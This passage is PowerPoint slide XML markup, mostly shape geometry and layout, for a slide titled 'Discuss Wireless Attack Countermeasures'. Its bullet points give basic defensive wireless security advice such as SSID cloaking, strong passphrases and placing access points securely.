                <a:gd name="T32" fmla="*/ 37 w 111"/>
                <a:gd name="T33" fmla="*/ 74 h 195"/>
                <a:gd name="T34" fmla="*/ 37 w 111"/>
                <a:gd name="T35" fmla="*/ 121 h 195"/>
                <a:gd name="T36" fmla="*/ 42 w 111"/>
                <a:gd name="T37" fmla="*/ 154 h 195"/>
                <a:gd name="T38" fmla="*/ 55 w 111"/>
                <a:gd name="T39" fmla="*/ 164 h 195"/>
                <a:gd name="T40" fmla="*/ 56 w 111"/>
                <a:gd name="T41" fmla="*/ 164 h 195"/>
                <a:gd name="T42" fmla="*/ 69 w 111"/>
                <a:gd name="T43" fmla="*/ 155 h 195"/>
                <a:gd name="T44" fmla="*/ 74 w 111"/>
                <a:gd name="T45" fmla="*/ 121 h 195"/>
                <a:gd name="T46" fmla="*/ 74 w 111"/>
                <a:gd name="T47" fmla="*/ 7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1" h="195">
                  <a:moveTo>
                    <a:pt x="111" y="118"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="143"/>
                    <a:pt x="106" y="162"/>
                    <a:pt x="96" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="188"/>
                    <a:pt x="72" y="195"/>
                    <a:pt x="55" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="195"/>
                    <a:pt x="25" y="188"/>
                    <a:pt x="15" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="162"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="118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3"/>
                    <a:pt x="15" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="7"/>
                    <a:pt x="38" y="0"/>
                    <a:pt x="55" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="0"/>
                    <a:pt x="86" y="7"/>
                    <a:pt x="96" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="33"/>
                    <a:pt x="111" y="52"/>
                    <a:pt x="111" y="77"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="111" y="118"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="74" y="74"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="59"/>
                    <a:pt x="72" y="48"/>
                    <a:pt x="69" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="34"/>
                    <a:pt x="61" y="30"/>
                    <a:pt x="56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49" y="30"/>
                    <a:pt x="45" y="34"/>
                    <a:pt x="41" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="48"/>
                    <a:pt x="37" y="59"/>
                    <a:pt x="37" y="74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37" y="136"/>
                    <a:pt x="38" y="147"/>
                    <a:pt x="42" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="162"/>
                    <a:pt x="49" y="165"/>
                    <a:pt x="55" y="16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2" y="165"/>
                    <a:pt x="66" y="162"/>
                    <a:pt x="69" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="148"/>
                    <a:pt x="74" y="136"/>
                    <a:pt x="74" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="74" y="7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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="126" name="Freeform 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16B921BE-D4C1-4EC8-B06B-05D680FA9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846" y="5118310"/>
              <a:ext cx="140038" cy="243668"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 3 w 111"/>
                <a:gd name="T1" fmla="*/ 105 h 192"/>
                <a:gd name="T2" fmla="*/ 13 w 111"/>
                <a:gd name="T3" fmla="*/ 0 h 192"/>
                <a:gd name="T4" fmla="*/ 105 w 111"/>
                <a:gd name="T5" fmla="*/ 0 h 192"/>
                <a:gd name="T6" fmla="*/ 105 w 111"/>
                <a:gd name="T7" fmla="*/ 30 h 192"/>
                <a:gd name="T8" fmla="*/ 43 w 111"/>
                <a:gd name="T9" fmla="*/ 30 h 192"/>
                <a:gd name="T10" fmla="*/ 39 w 111"/>
                <a:gd name="T11" fmla="*/ 75 h 192"/>
                <a:gd name="T12" fmla="*/ 49 w 111"/>
                <a:gd name="T13" fmla="*/ 68 h 192"/>
                <a:gd name="T14" fmla="*/ 62 w 111"/>
                <a:gd name="T15" fmla="*/ 65 h 192"/>
                <a:gd name="T16" fmla="*/ 98 w 111"/>
                <a:gd name="T17" fmla="*/ 81 h 192"/>
                <a:gd name="T18" fmla="*/ 111 w 111"/>
                <a:gd name="T19" fmla="*/ 128 h 192"/>
                <a:gd name="T20" fmla="*/ 96 w 111"/>
                <a:gd name="T21" fmla="*/ 173 h 192"/>
                <a:gd name="T22" fmla="*/ 55 w 111"/>
                <a:gd name="T23" fmla="*/ 192 h 192"/>
                <a:gd name="T24" fmla="*/ 16 w 111"/>
                <a:gd name="T25" fmla="*/ 177 h 192"/>
                <a:gd name="T26" fmla="*/ 0 w 111"/>
                <a:gd name="T27" fmla="*/ 138 h 192"/>
                <a:gd name="T28" fmla="*/ 1 w 111"/>
                <a:gd name="T29" fmla="*/ 137 h 192"/>
                <a:gd name="T30" fmla="*/ 36 w 111"/>
                <a:gd name="T31" fmla="*/ 135 h 192"/>
                <a:gd name="T32" fmla="*/ 42 w 111"/>
                <a:gd name="T33" fmla="*/ 155 h 192"/>
                <a:gd name="T34" fmla="*/ 55 w 111"/>
                <a:gd name="T35" fmla="*/ 162 h 192"/>
                <a:gd name="T36" fmla="*/ 69 w 111"/>
                <a:gd name="T37" fmla="*/ 153 h 192"/>
                <a:gd name="T38" fmla="*/ 74 w 111"/>
                <a:gd name="T39" fmla="*/ 129 h 192"/>
                <a:gd name="T40" fmla="*/ 69 w 111"/>
                <a:gd name="T41" fmla="*/ 102 h 192"/>
                <a:gd name="T42" fmla="*/ 54 w 111"/>
                <a:gd name="T43" fmla="*/ 92 h 192"/>
                <a:gd name="T44" fmla="*/ 42 w 111"/>
                <a:gd name="T45" fmla="*/ 96 h 192"/>
                <a:gd name="T46" fmla="*/ 36 w 111"/>
                <a:gd name="T47" fmla="*/ 108 h 192"/>
                <a:gd name="T48" fmla="*/ 3 w 111"/>
                <a:gd name="T49" fmla="*/ 105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1" h="192">
                  <a:moveTo>
                    <a:pt x="3" y="105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39" y="75"/>
                    <a:pt x="39" y="75"/>
                    <a:pt x="39" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="72"/>
                    <a:pt x="45" y="70"/>
                    <a:pt x="49" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="66"/>
                    <a:pt x="57" y="65"/>
                    <a:pt x="62" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="65"/>
                    <a:pt x="89" y="70"/>
                    <a:pt x="98" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="92"/>
                    <a:pt x="111" y="108"/>
                    <a:pt x="111" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="146"/>
                    <a:pt x="106" y="161"/>
                    <a:pt x="96" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="186"/>
                    <a:pt x="73" y="192"/>
                    <a:pt x="55" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="192"/>
                    <a:pt x="27" y="187"/>
                    <a:pt x="16" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="168"/>
                    <a:pt x="0" y="154"/>
                    <a:pt x="0" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="137"/>
                    <a:pt x="1" y="137"/>
                    <a:pt x="1" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="135"/>
                    <a:pt x="36" y="135"/>
                    <a:pt x="36" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="144"/>
                    <a:pt x="38" y="150"/>
                    <a:pt x="42" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="160"/>
                    <a:pt x="50" y="162"/>
                    <a:pt x="55" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="162"/>
                    <a:pt x="66" y="159"/>
                    <a:pt x="69" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="147"/>
                    <a:pt x="74" y="139"/>
                    <a:pt x="74" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="117"/>
                    <a:pt x="72" y="109"/>
                    <a:pt x="69" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="96"/>
                    <a:pt x="61" y="92"/>
                    <a:pt x="54" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="92"/>
                    <a:pt x="45" y="94"/>
                    <a:pt x="42" y="96"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="99"/>
                    <a:pt x="37" y="103"/>
                    <a:pt x="36" y="108"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3" y="10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Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p: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958C8B45-68FD-4C11-8CCA-3AC65550BE94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-8709" y="4788870"/>
            <a:ext cx="2776992" cy="69403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 algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Discuss Wireless Attack Countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="227835985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" name="Picture Placeholder 40" descr="Abstract background of blue mesh and nodes"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2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319" b="7319"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8559644" y="1330248"/>
            <a:ext cx="2910684" cy="1397592"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture Placeholder 10" descr="Abstract background of blue mesh and nodes"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2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319" b="7319"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1330248"/>
            <a:ext cx="2910684" cy="1397592"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40" name="Picture Placeholder 39" descr="Abstract background of blue mesh and nodes"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2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319" b="7319"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4640672" y="1330248"/>
            <a:ext cx="2910684" cy="1397592"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Subtitle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4640696" y="2971800"/>
            <a:ext cx="3121773" cy="871555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54381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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="165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SSID cloaking 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to keep certain default wireless messages from broadcasting the ID to everyone</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 2540"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4339066" y="3048461"/>
            <a:ext cx="279328" cy="2793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32" y="6661"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="20540" y="6471"/>
                  <a:pt x="20228" y="6473"/>
                  <a:pt x="20038" y="6667"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19903" y="6804"/>
                  <a:pt x="19870" y="7000"/>
                  <a:pt x="19929" y="7171"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19918" y="7175"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20365" y="8298"/>
                  <a:pt x="20618" y="951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cubicBezTo>
                  <a:pt x="5378" y="20618"/>
                  <a:pt x="982" y="16223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3575" y="982"/>
                  <a:pt x="16077" y="2136"/>
                  <a:pt x="17862" y="3989"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17868" y="3982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18062" y="4157"/>
                  <a:pt x="18359" y="4153"/>
                  <a:pt x="18544" y="3965"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18734" y="3771"/>
                  <a:pt x="18732" y="3461"/>
                  <a:pt x="18539" y="3270"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18520" y="3252"/>
                  <a:pt x="18496" y="3244"/>
                  <a:pt x="18476" y="3230"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16521" y="1241"/>
                  <a:pt x="13810" y="0"/>
                  <a:pt x="10800" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4835" y="0"/>
                  <a:pt x="0" y="4835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5" y="21600"/>
                  <a:pt x="21600" y="16764"/>
                  <a:pt x="21600" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="9412"/>
                  <a:pt x="21329" y="8089"/>
                  <a:pt x="20851" y="6869"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20828" y="6794"/>
                  <a:pt x="20793" y="6721"/>
                  <a:pt x="20732" y="6661"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10792" y="13534"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6238" y="8980"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6149" y="8891"/>
                  <a:pt x="6027" y="8836"/>
                  <a:pt x="5891" y="8836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5620" y="8836"/>
                  <a:pt x="5400" y="9056"/>
                  <a:pt x="5400" y="9327"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="9463"/>
                  <a:pt x="5455" y="9585"/>
                  <a:pt x="5544" y="9675"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10453" y="14583"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10542" y="14672"/>
                  <a:pt x="10664" y="14727"/>
                  <a:pt x="10800" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10940" y="14727"/>
                  <a:pt x="11064" y="14668"/>
                  <a:pt x="11154" y="14574"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11155" y="14576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19353" y="5988"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19353" y="5989"/>
                  <a:pt x="19354" y="5990"/>
                  <a:pt x="19354" y="5991"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20055" y="5255"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20055" y="5255"/>
                  <a:pt x="20054" y="5254"/>
                  <a:pt x="20054" y="5253"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21464" y="3775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21463" y="3774"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21547" y="3686"/>
                  <a:pt x="21600" y="3567"/>
                  <a:pt x="21600" y="3436"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="3166"/>
                  <a:pt x="21380" y="2945"/>
                  <a:pt x="21109" y="2945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20969" y="2945"/>
                  <a:pt x="20844" y="3005"/>
                  <a:pt x="20755" y="3099"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20754" y="3097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19493" y="4419"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19492" y="4418"/>
                  <a:pt x="19491" y="4416"/>
                  <a:pt x="19490" y="4415"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18805" y="5133"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18806" y="5134"/>
                  <a:pt x="18807" y="5136"/>
                  <a:pt x="18807" y="5137"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18807" y="5137"/>
                  <a:pt x="10792" y="13534"/>
                  <a:pt x="10792" y="1353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Lato Light" charset="0"/>
              <a:ea typeface="Lato Light" charset="0"/>
              <a:cs typeface="Lato Light" charset="0"/>
              <a:sym typeface="Gill Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Subtitle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4640696" y="4049580"/>
            <a:ext cx="3121773" cy="1125471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54381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Do not use your SSID, company name, network name, or any </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="165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easy-to-guess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 string in passphrases </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 2540"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4339066" y="4126241"/>
            <a:ext cx="279328" cy="2793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32" y="6661"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="20540" y="6471"/>
                  <a:pt x="20228" y="6473"/>
                  <a:pt x="20038" y="6667"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19903" y="6804"/>
                  <a:pt x="19870" y="7000"/>
                  <a:pt x="19929" y="7171"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19918" y="7175"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20365" y="8298"/>
                  <a:pt x="20618" y="951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cubicBezTo>
                  <a:pt x="5378" y="20618"/>
                  <a:pt x="982" y="16223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3575" y="982"/>
                  <a:pt x="16077" y="2136"/>
                  <a:pt x="17862" y="3989"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17868" y="3982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18062" y="4157"/>
                  <a:pt x="18359" y="4153"/>
                  <a:pt x="18544" y="3965"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18734" y="3771"/>
                  <a:pt x="18732" y="3461"/>
                  <a:pt x="18539" y="3270"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18520" y="3252"/>
                  <a:pt x="18496" y="3244"/>
                  <a:pt x="18476" y="3230"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16521" y="1241"/>
                  <a:pt x="13810" y="0"/>
                  <a:pt x="10800" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4835" y="0"/>
                  <a:pt x="0" y="4835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5" y="21600"/>
                  <a:pt x="21600" y="16764"/>
                  <a:pt x="21600" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="9412"/>
                  <a:pt x="21329" y="8089"/>
                  <a:pt x="20851" y="6869"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20828" y="6794"/>
                  <a:pt x="20793" y="6721"/>
                  <a:pt x="20732" y="6661"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10792" y="13534"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6238" y="8980"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6149" y="8891"/>
                  <a:pt x="6027" y="8836"/>
                  <a:pt x="5891" y="8836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5620" y="8836"/>
                  <a:pt x="5400" y="9056"/>
                  <a:pt x="5400" y="9327"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="9463"/>
                  <a:pt x="5455" y="9585"/>
                  <a:pt x="5544" y="9675"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10453" y="14583"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10542" y="14672"/>
                  <a:pt x="10664" y="14727"/>
                  <a:pt x="10800" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10940" y="14727"/>
                  <a:pt x="11064" y="14668"/>
                  <a:pt x="11154" y="14574"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11155" y="14576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19353" y="5988"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19353" y="5989"/>
                  <a:pt x="19354" y="5990"/>
                  <a:pt x="19354" y="5991"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20055" y="5255"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20055" y="5255"/>
                  <a:pt x="20054" y="5254"/>
                  <a:pt x="20054" y="5253"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21464" y="3775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21463" y="3774"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21547" y="3686"/>
                  <a:pt x="21600" y="3567"/>
                  <a:pt x="21600" y="3436"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="3166"/>
                  <a:pt x="21380" y="2945"/>
                  <a:pt x="21109" y="2945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20969" y="2945"/>
                  <a:pt x="20844" y="3005"/>
                  <a:pt x="20755" y="3099"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20754" y="3097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19493" y="4419"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19492" y="4418"/>
                  <a:pt x="19491" y="4416"/>
                  <a:pt x="19490" y="4415"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18805" y="5133"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18806" y="5134"/>
                  <a:pt x="18807" y="5136"/>
                  <a:pt x="18807" y="5137"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18807" y="5137"/>
                  <a:pt x="10792" y="13534"/>
                  <a:pt x="10792" y="1353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Lato Light" charset="0"/>
              <a:ea typeface="Lato Light" charset="0"/>
              <a:cs typeface="Lato Light" charset="0"/>
              <a:sym typeface="Gill Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Subtitle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8558774" y="5554235"/>
            <a:ext cx="2797841" cy="617639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54381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Place wireless APs in a </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="165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secure location</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 2540"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8257144" y="5630896"/>
            <a:ext cx="279328" cy="2793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32" y="6661"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="20540" y="6471"/>
                  <a:pt x="20228" y="6473"/>
                  <a:pt x="20038" y="6667"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19903" y="6804"/>
                  <a:pt x="19870" y="7000"/>
                  <a:pt x="19929" y="7171"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19918" y="7175"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20365" y="8298"/>
                  <a:pt x="20618" y="951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cubicBezTo>
                  <a:pt x="5378" y="20618"/>
                  <a:pt x="982" y="16223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3575" y="982"/>
                  <a:pt x="16077" y="2136"/>
                  <a:pt x="17862" y="3989"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17868" y="3982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18062" y="4157"/>
                  <a:pt x="18359" y="4153"/>
                  <a:pt x="18544" y="3965"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18734" y="3771"/>
                  <a:pt x="18732" y="3461"/>
                  <a:pt x="18539" y="3270"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18520" y="3252"/>
                  <a:pt x="18496" y="3244"/>
                  <a:pt x="18476" y="3230"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16521" y="1241"/>
                  <a:pt x="13810" y="0"/>
                  <a:pt x="10800" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4835" y="0"/>
                  <a:pt x="0" y="4835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5" y="21600"/>
                  <a:pt x="21600" y="16764"/>
                  <a:pt x="21600" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="9412"/>
                  <a:pt x="21329" y="8089"/>
                  <a:pt x="20851" y="6869"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20828" y="6794"/>
                  <a:pt x="20793" y="6721"/>
                  <a:pt x="20732" y="6661"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10792" y="13534"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6238" y="8980"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6149" y="8891"/>
                  <a:pt x="6027" y="8836"/>
                  <a:pt x="5891" y="8836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5620" y="8836"/>
                  <a:pt x="5400" y="9056"/>
                  <a:pt x="5400" y="9327"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="9463"/>
                  <a:pt x="5455" y="9585"/>
                  <a:pt x="5544" y="9675"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10453" y="14583"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10542" y="14672"/>
                  <a:pt x="10664" y="14727"/>
                  <a:pt x="10800" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10940" y="14727"/>
                  <a:pt x="11064" y="14668"/>
                  <a:pt x="11154" y="14574"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11155" y="14576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19353" y="5988"/>
                </a:lnTo>
                <a:cubicBezTo>
